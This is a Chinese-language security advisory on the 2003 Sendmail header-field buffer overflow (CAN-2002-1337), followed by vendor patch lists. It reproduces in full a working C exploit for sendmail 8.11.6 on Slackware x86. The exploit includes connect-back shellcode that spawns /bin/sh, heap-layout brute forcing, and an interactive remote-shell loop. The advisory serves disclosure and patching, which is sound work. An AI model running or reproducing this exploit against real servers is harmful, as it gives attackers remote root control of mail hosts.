Sendmail头字段远程缓冲区溢出漏洞发布时间:2003-03-04 更新时间:2003-03-04 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 CVE(CAN) ID:CAN-2002-1337 受影响系统 Sendmail Pro (all versions)详细描述 Sendmail是流行的邮件传输代理。 ISS公司发现sendmail存在一个远程漏洞,这个漏洞可导致远程攻击者控制SENDMAIL服务器。此漏洞可以通过构建特殊的邮件来触发,由于此邮件属于正常邮件性质,因此即使有防火墙或过滤设备保护的网络也很难被发现,并且如果成功利用,不会留下任何日志。 Sendmail远程漏洞发生在SMTP传输阶段处理邮件头字段时发生。当邮件包含地址或者地址列表(如"From","To","CC"字段)时,Sendmail会尝试检查地址是否合法,这个过程由crackaddr()函数完成,此函数位于Sendmail源代码树的headers.c文件中。 静态缓冲区在处理过程中用于存储数据,Sendmail当探测到缓冲区满的时候,会停止增加字符而来保护发生缓冲区溢出,Sendmail实现包含多个安全检查来确保字符过滤正确,但是其中有一个安全检测存在漏洞,攻击者发送恶意地址字段可触发缓冲区溢出。 X-Force已经开发出漏洞可以在现实场景中实现,此漏洞可在X86架构和其他平台上实现。并且由于使用静态缓冲区,因此不可执行堆栈保护机制将不起作用。 如果Sendmail系统打过补丁后,会记录如下信息: Dropped invalid comments from header address 并丢弃非法头字段来保护服务器接收处理此邮件。 测试代码 /*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/ /*## sendmail 8.11.6 #*/ /* proof of concept code for remote sendmail vulnerability */ /* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */ /* [-c count] [-t timeout] [-v 80] */ /* where: */ /* target - address of the target host to run this code against */ /* localaddr - address of the host you are running this code from */ /* localport - local port that will listen for shellcode connection */ /* ptr - base ptr of the sendmail buffer containing our arbitrary data */ /* count - brute force loop counter */ /* timeout - select call timeout while waiting for shellcode connection */ /* v - version of the target OS (currently only Slackware 8.0 is supported) */ /* */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <unistd.h> #include <netdb.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> #define NOP 0xf8 #define MAXLINE 2048 #define PNUM 12 #define OFF1 (288+156-12) #define OFF2 (1088+288+156+20+48) #define OFF3 (139*2) int tab[]={23,24,25,26}; #define IDX2PTR(i) (PTR+i-OFF1) #define ALLOCBLOCK(idx,size) memset(&lookup[idx],1,size) #define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||\ (((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0))) #define AOFF 33 #define AMSK 38 #define POFF 48 #define PMSK 53 char* lookup=NULL; int gfirst; char shellcode[]= /* 116 bytes */ "\xeb\x02" /* jmp <shellcode+4> */ "\xeb\x08" /* jmp <shellcode+12> */ "\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */ "\xcd\x7f" /* int $0x7f */ "\xc3" /* ret */ "\x5f" /* pop %edi */ "\xff\x47\x01" /* incl 0x1(%edi) */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\x43" /* inc %ebx */ "\xff\xd7" /* call *%edi */ "\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x5e" /* pop %esi */ "\x6a\x10" /* push $0x10 */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\x50" /* push %eax */ "\x5e" /* pop %esi */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x6a\x03" /* push $0x3 */ "\x5b" /* pop %ebx */ "\xff\xd7" /* call *%edi */ "\x56" /* push %esi */ "\x5b" /* pop %ebx */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x03" /* mov $0x3,%cl */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x3f" /* mov $0x3f,%al */ "\x49" /* dec %ecx */ "\xff\xd7" /* call *%edi */ "\x41" /* inc %ecx */ "\xe2\xf6" /* loop <shellcode+81> */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x54" /* push %esp */ "\x5b" /* pop %ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x0b" /* mov $0xb,%al */ "\xff\xd7" /* call *%edi */ ; int PTR,MPTR=0xbfffa01c; void putaddr(char* p,int i) { *p++=(i&0xff); *p++=((i>>8)&0xff); *p++=((i>>16)&0xff); *p++=((i>>24)&0xff); } void sendcommand(int sck,char *data,char resp) { char buf[1024]; int i; if (send(sck,data,strlen(data),0)<0) { perror("error");exit(-1); } if (resp) { if ((i=recv(sck,buf,sizeof(buf),0))<0) { perror("error");exit(-1); } buf[i]=0; printf("%s",buf); } } int rev(int a){ int i=1; if((*(char*)&i)) return(a); return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24); } void initlookup() { int i; if (!(lookup=(char*)malloc(MAXLINE))) { printf("error: malloc\n");exit(-1); } ALLOCBLOCK(0,MAXLINE); memset(lookup+OFF1,0,OFF2-OFF1); for(i=0;i<sizeof(tab)/4;i++) ALLOCBLOCK(OFF1+4*tab[i],4); gfirst=1; } int validaddr(int addr) { unsigned char buf[4],c; int i,*p=(int*)buf; *p=addr; for(i=0;i<4;i++) { c=buf[i]; if (NOTVALIDCHAR(c)) return 0; } return 1; } int freeblock(int idx,int size) { int i,j; for(i=j=0;i<size;i++) { if (!lookup[idx+i]) j++; } return (i==j); } int findblock(int addr,int size,int begin) { int i,j,idx,ptr; ptr=addr; if (begin) { idx=OFF1+addr-PTR; while(1) { while(((!validaddr(ptr))||lookup[idx])&&(idx<OFF2)) { idx+=4; ptr+=4; } if (idx>=OFF2) return 0; if (freeblock(idx,size)) return idx; idx+=4; ptr+=4; } } else { idx=addr-PTR; while(1) { while(((!validaddr(ptr))||lookup[idx])&&(idx>OFF1)) { idx-=4; ptr-=4; } if (idx<OFF1) return 0; if (freeblock(idx,size)) return idx; idx-=4; ptr-=4; } } } int findsblock(int sptr) { int optr,sidx,size; size=gfirst ? 0x2c:0x04; optr=sptr; while(sidx=findblock(sptr,size,1)) { sptr=IDX2PTR(sidx); if (gfirst) { if (validaddr(sptr)) { ALLOCBLOCK(sidx,size); break; } else sptr=optr; } else { if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&& freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) { ALLOCBLOCK(sidx-0x18,4); ALLOCBLOCK(sidx-0x0e,2); ALLOCBLOCK(sidx,4); ALLOCBLOCK(sidx+0x0c,4); ALLOCBLOCK(sidx+0x10,4); sidx-=0x18; break; } else sptr=optr; } sptr+=4; optr=sptr; } gfirst=0; return sidx; } int findfblock(int fptr,int i1,int i2,int i3) { int fidx,optr; optr=fptr; while(fidx=findblock(fptr,4,0)) { fptr=IDX2PTR(fidx); if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&& freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) { ALLOCBLOCK(fidx,4); ALLOCBLOCK(fidx-i3,4); ALLOCBLOCK(fidx-i2-i3,4); ALLOCBLOCK(fidx-i2-i3+i1,4); break; } else fptr=optr; fptr-=4; optr=fptr; } return fidx; } void findvalmask(char* val,char* mask,int len) { int i; unsigned char c,m; for(i=0;i<len;i++) { c=val[i]; m=0xff; while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--; val[i]=c^m; mask[i]=m; } } void initasmcode(char *addr,int port) { char abuf[4],amask[4],pbuf[2],pmask[2]; char name[256]; struct hostent *hp; int i; if (!addr) gethostname(name,sizeof(name)); else strcpy(name,addr); if ((i=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { printf("error: address\n");exit(-1); } memcpy(&i,hp->h_addr,4); } putaddr(abuf,rev(i)); pbuf[0]=(port>>8)&0xff; pbuf[1]=(port)&0xff; findvalmask(abuf,amask,4); findvalmask(pbuf,pmask,2); memcpy(&shellcode[AOFF],abuf,4); memcpy(&shellcode[AMSK],amask,4); memcpy(&shellcode[POFF],pbuf,2); memcpy(&shellcode[PMSK],pmask,2); } int main(int argc,char **argv){ int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp; int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25; fd_set readfs; struct timeval t; struct sockaddr_in address; struct hostent *hp; char buf[4096],cmd[4096]; char *p,*host,*myhost=NULL; printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n"); printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n"); if (argc<3) { printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]); exit(-1); } while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) { switch(c) { case 'b': port=atoi(optarg);break; case 'c': count=atoi(optarg);break; case 'l': myhost=optarg;break; case 't': timeout=atoi(optarg);break; case 'v': vers=atoi(optarg);break; case 'p': sscanf(optarg,"%x",&MPTR); } } host=argv[1]; srv=socket(AF_INET,SOCK_STREAM,0); bzero(&address,sizeof(address)); address.sin_family=AF_INET; address.sin_port=htons(port); if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) { printf("error: bind\n");exit(-1); } if (listen(srv,10)==-1) { printf("error: listen\n");exit(-1); } initasmcode(myhost,port); for(i4=0;i4<count;i4++,MPTR+=cnt*4) { PTR=MPTR; sck=socket(AF_INET,SOCK_STREAM,0); bzero(&address,sizeof(address)); address.sin_family=AF_INET; address.sin_port=htons(25); if ((address.sin_addr.s_addr=inet_addr(host))==-1) { if ((hp=gethostbyname(host))==NULL) { printf("error: address\n");exit(-1); } memcpy(&address.sin_addr.s_addr,hp->h_addr,4); } if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) { printf("error: connect\n");exit(-1); } initlookup(); sendcommand(sck,"helo yahoo.com\n",0); sendcommand(sck,"mail from: anonymous@yahoo.com\n",0); sendcommand(sck,"rcpt to: lp\n",0); sendcommand(sck,"data\n",0); aidx=findblock(PTR,PNUM*4,1); ALLOCBLOCK(aidx,PNUM*4); aptr=IDX2PTR(aidx); printf(".");fflush(stdout); jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1); ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4); switch(vers) { case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break; default: exit(-1); } i2-=8; p=buf; for(i=0;i<138;i++) { *p++='<';*p++='>'; } *p++='('; for(i=0;i<l;i++) *p++=NOP; *p++=')'; *p++=0; putaddr(&buf[OFF3+l],aptr); sprintf(cmd,"From: %s\n",buf); sendcommand(sck,cmd,0); sendcommand(sck,"Subject: hello\n",0); memset(cmd,NOP,MAXLINE); cmd[MAXLINE-2]='\n'; cmd[MAXLINE-1]=0; cnt=0; while(cnt<PNUM) { sptr=aptr; fptr=IDX2PTR(OFF2); if (!(sidx=findsblock(sptr))) break; sptr=IDX2PTR(sidx); if (!(fidx=findfblock(fptr,i1,i2,i3))) break; fptr=IDX2PTR(fidx); jmp=IDX2PTR(jidx); while (!validaddr(jmp)) jmp+=4; putaddr(&cmd[aidx],sptr); putaddr(&cmd[sidx+0x24],aptr); putaddr(&cmd[sidx+0x28],aptr); putaddr(&cmd[sidx+0x18],fptr-i2-i3); putaddr(&cmd[fidx-i2-i3],0x01010101); putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8); putaddr(&cmd[fidx-i3],fptr-i3); putaddr(&cmd[fidx],jmp); aidx+=4; PTR-=4; cnt++; } p=&cmd[jidx+4*PNUM]; for(i=0;i<strlen(shellcode);i++) { *p++=shellcode[i]; } sendcommand(sck,cmd,0); sendcommand(sck,"\n",0); sendcommand(sck,".\n",0); free(lookup); FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(srv,&readfs); t.tv_sec=timeout; t.tv_usec=0; if (select(srv+1,&readfs,NULL,NULL,&t)>0) { close(sck); found=1; if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) { printf("error: accept\n");exit(-1); } close(srv); printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr); write(sck,"/bin/uname -a\n",14); } else { close(sck); found=0; } while(found){ FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(sck,&readfs); if(select(sck+1,&readfs,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&readfs)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec\n");exit(-1);} } write(sck,buf,cnt); } if(FD_ISSET(sck,&readfs)){ if((cnt=read(sck,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec\n");exit(-1);} } write(1,buf,cnt); } } } } } 解决方案 Sendmail已经发布补丁: ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch 或者建议管理员升级到8.12.8版本。 IBM公司已经提供如下补丁: 临时补丁如下: ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z 正式补丁为: APAR number for AIX 4.3.3: IY40500 (available approx. 03/12/2003) APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003) APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003) Mandrake linux提供如下补丁: Corporate Server 2.1: cc5590958147fdc6d7cc6b6804e1c450 corporate/2.1/RPMS/sendmail-8.12.6-3.2mdk.i586.rpm 9ee215b8d3aa61a75d7bfa7236c89217 corporate/2.1/RPMS/sendmail-cf-8.12.6-3.2mdk.i586.rpm 31ee7452500bead59609119af17b6ebc corporate/2.1/RPMS/sendmail-devel-8.12.6-3.2mdk.i586.rpm bb8b7830640b3b0cbb3c471e60638d26 corporate/2.1/RPMS/sendmail-doc-8.12.6-3.2mdk.i586.rpm 7bf9dab89608b3ecae5574946c78dde8 corporate/2.1/SRPMS/sendmail-8.12.6-3.2mdk.src.rpm Linux-Mandrake 7.2: ffd7899291d6aba1753d996a44661ed2 7.2/RPMS/sendmail-8.11.0-4.2mdk.i586.rpm 47906b6c6ceffb16d9750b88eef18bd8 7.2/RPMS/sendmail-cf-8.11.0-4.2mdk.i586.rpm f84955b5bf1b9d48804694fc8d9fa038 7.2/RPMS/sendmail-doc-8.11.0-4.2mdk.i586.rpm 524c8c9bab32697ca9d7be41b4b34dff 7.2/SRPMS/sendmail-8.11.0-4.2mdk.src.rpm Mandrake Linux 8.0: d8dd245a3fa0d5bd5910da8ed322e4b2 8.0/RPMS/sendmail-8.11.6-4.4mdk.i586.rpm 1c1fa1730c9689ef8ca2fa9b125dde41 8.0/RPMS/sendmail-cf-8.11.6-4.4mdk.i586.rpm 203198fe2cb9914d0f104c2ffa15061b 8.0/RPMS/sendmail-doc-8.11.6-4.4mdk.i586.rpm 2bd522ab0fad1734d2522547d6abe79f 8.0/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.0/PPC: 49b589d9c1db215968698296b7e38949 ppc/8.0/RPMS/sendmail-8.11.6-4.4mdk.ppc.rpm 1f0dc78436c35f5397f25a331a6be784 ppc/8.0/RPMS/sendmail-cf-8.11.6-4.4mdk.ppc.rpm beaa61eb5a224c67268f1ccbcaa27287 ppc/8.0/RPMS/sendmail-doc-8.11.6-4.4mdk.ppc.rpm 2bd522ab0fad1734d2522547d6abe79f ppc/8.0/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.1: a8e8831e1333f53c4beaad484fba6d6b 8.1/RPMS/sendmail-8.11.6-4.4mdk.i586.rpm 07822e0924603156a328a5d71b35b006 8.1/RPMS/sendmail-cf-8.11.6-4.4mdk.i586.rpm 943676ff37789e3ed56c3feeb4b790c6 8.1/RPMS/sendmail-doc-8.11.6-4.4mdk.i586.rpm 2bd522ab0fad1734d2522547d6abe79f 8.1/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.1/IA64: 67ff005b6eda2074f9c1fc61678eaec5 ia64/8.1/RPMS/sendmail-8.11.6-4.4mdk.ia64.rpm a41192b0d1083047d2437209bc857d50 ia64/8.1/RPMS/sendmail-cf-8.11.6-4.4mdk.ia64.rpm 827a91f80a88f80f1662c8417c702b37 ia64/8.1/RPMS/sendmail-doc-8.11.6-4.4mdk.ia64.rpm 2bd522ab0fad1734d2522547d6abe79f ia64/8.1/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.2: c106cd4223cb8defc0331b9ae203c712 8.2/RPMS/sendmail-8.12.1-4.2mdk.i586.rpm 199d6e0d6c5bd79d8bbbaf5482e472e6 8.2/RPMS/sendmail-cf-8.12.1-4.2mdk.i586.rpm b70011d22c13c152d35f9c9572e57051 8.2/RPMS/sendmail-devel-8.12.1-4.2mdk.i586.rpm 865de74f4848e781071a4606a20e42b9 8.2/RPMS/sendmail-doc-8.12.1-4.2mdk.i586.rpm 5d251dd3fc01d98027820282c39a47c4 8.2/SRPMS/sendmail-8.12.1-4.2mdk.src.rpm Mandrake Linux 8.2/PPC: 9b96aa12a5843801e3141ed2aa0bc8c9 ppc/8.2/RPMS/sendmail-8.12.1-4.2mdk.ppc.rpm 1b97053c396aadd596cc8111362938f8 ppc/8.2/RPMS/sendmail-cf-8.12.1-4.2mdk.ppc.rpm 0d8a132188f56a3a2b25a36b1fdf8cd0 ppc/8.2/RPMS/sendmail-devel-8.12.1-4.2mdk.ppc.rpm 911165311c20100dd0bd945fc7a8bac9 ppc/8.2/RPMS/sendmail-doc-8.12.1-4.2mdk.ppc.rpm 5d251dd3fc01d98027820282c39a47c4 ppc/8.2/SRPMS/sendmail-8.12.1-4.2mdk.src.rpm Mandrake Linux 9.0: cc5590958147fdc6d7cc6b6804e1c450 9.0/RPMS/sendmail-8.12.6-3.2mdk.i586.rpm 9ee215b8d3aa61a75d7bfa7236c89217 9.0/RPMS/sendmail-cf-8.12.6-3.2mdk.i586.rpm 31ee7452500bead59609119af17b6ebc 9.0/RPMS/sendmail-devel-8.12.6-3.2mdk.i586.rpm bb8b7830640b3b0cbb3c471e60638d26 9.0/RPMS/sendmail-doc-8.12.6-3.2mdk.i586.rpm 7bf9dab89608b3ecae5574946c78dde8 9.0/SRPMS/sendmail-8.12.6-3.2mdk.src.rpm CONECTIVA LINUX提供如下补丁: UPDATED PACKAGES ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm Redhat提供如下补丁: Red Hat Linux 6.2 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-1.62.2.src.rpm [ via FTP ] [ via HTTP ] 35d83351ea84fdae048b3e6f556bfc4a i386: sendmail-8.11.6-1.62.2.i386.rpm [ via FTP ] [ via HTTP ] 71ddff0b307887232ad2b57c6f828dbd sendmail-cf-8.11.6-1.62.2.i386.rpm [ via FTP ] [ via HTTP ] 3b398feb4f97b05873a864be5d914ee8 sendmail-doc-8.11.6-1.62.2.i386.rpm [ via FTP ] [ via HTTP ] ba2e0d80e5efc7fe3ba2d55f9caa9cb1 Red Hat Linux 7.0 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.70.src.rpm [ via FTP ] [ via HTTP ] e3a9eb220d844e1e3a1bd84ada63c853 i386: sendmail-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] f3bdb70c4b1d95d10a827db33bf77a46 sendmail-cf-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] e7a8c264257e207d18257dfe075a5fd1 sendmail-devel-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] c6cf8af32a436d42d0982b99260ce811 sendmail-doc-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] ba9251c4ed7fc2916e27c8bc406d7f58 Red Hat Linux 7.1 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.71.src.rpm [ via FTP ] [ via HTTP ] c2eb6d0135dc60e83506f0c20148822c i386: sendmail-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] c3a518db2157a56edc5a94f42c32f8db sendmail-cf-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] 6cb3a88c447b56f37d0ebba1df4adb23 sendmail-devel-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] f2fa0e42d15c723c33c876ea075b4508 sendmail-doc-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] 2cee572aa2fe1eddb3d22f7ab4d43a20 Red Hat Linux 7.2 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.72.src.rpm [ via FTP ] [ via HTTP ] 854ee4390631bdcb818fe6cdc132f7da i386: sendmail-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] dbce6be563a5642400d0a8a9e97f88fc sendmail-cf-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] 92b8773b155b2cce446645dd55842e87 sendmail-devel-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] d810fe7d6a61550e3b0ac3a509d00fed sendmail-doc-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] 722780636eb24b8168f8464817e21de4 ia64: sendmail-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] e83825fb7552ad321cb09ecf86df4a29 sendmail-cf-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] 70e2f72dffad5ec8565dc957f5c0b111 sendmail-devel-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] 8d86d83586e75cbd03f7bccdfb5b97f2 sendmail-doc-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] 16eac17677891e77e8eb70bf76dac135 Red Hat Linux 7.3 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.73.src.rpm [ via FTP ] [ via HTTP ] 2049d17db0e321ba6028ee4a7ca2ae93 i386: sendmail-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] ce6852e4c389405bed1f498514b5fa0f sendmail-cf-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] f994f26ab50b8141ec27a6b04e819d37 sendmail-devel-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] d6da03d08cdd8e9933616c0e66841302 sendmail-doc-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] 5fb65ba4b8e91d9d87451e2d1400411f Red Hat Linux 8.0 -------------------------------------------------------------------------------- SRPMS: sendmail-8.12.8-1.80.src.rpm [ via FTP ] [ via HTTP ] 29d277537beb532d6b5f48ad30d81d45 i386: sendmail-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] 8bba0d1400ab2e96e3d3c78ce5015597 sendmail-cf-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] 55ef5ca9c777278eddd48e365ba471c2 sendmail-devel-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] 87aecce2ae343a69fe1df716b5e89685 sendmail-doc-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] d945b47a44597e5da06f79658e38b9d8 FreeBSD提供如下补丁信息: ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail.patch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail.patch.asc 或采用两进制文件: ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-crypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-crypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-nocrypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-nocrypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-crypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-crypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-nocrypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-nocrypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-crypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-crypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-nocrypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-nocrypto.bin.gz.asc SGI提供如下补丁: http://www.sgi.com/support/security/ ftp://patches.sgi.com/support/free/security/patches/ Sun提供如下补丁: SPARC Platform * Solaris 2.6 patch 105395-08 * Solaris 7 patch 107684-08 * Solaris 8 patch 110615-08 * Solaris 9 patch 113575-03 x86 Platform * Solaris 2.6 patch 105396-08 * Solaris 7 patch 107685-08 * Solaris 8 patch 110616-08 * Solaris 9 patch 114137-02 您可以使用下列链接来下载相应补丁: http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<补丁ID>&method=h 其他用户请参看供应商信息。 相关信息 参考:http://www.cert.org/advisories/CA-2003-07.html http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950 |
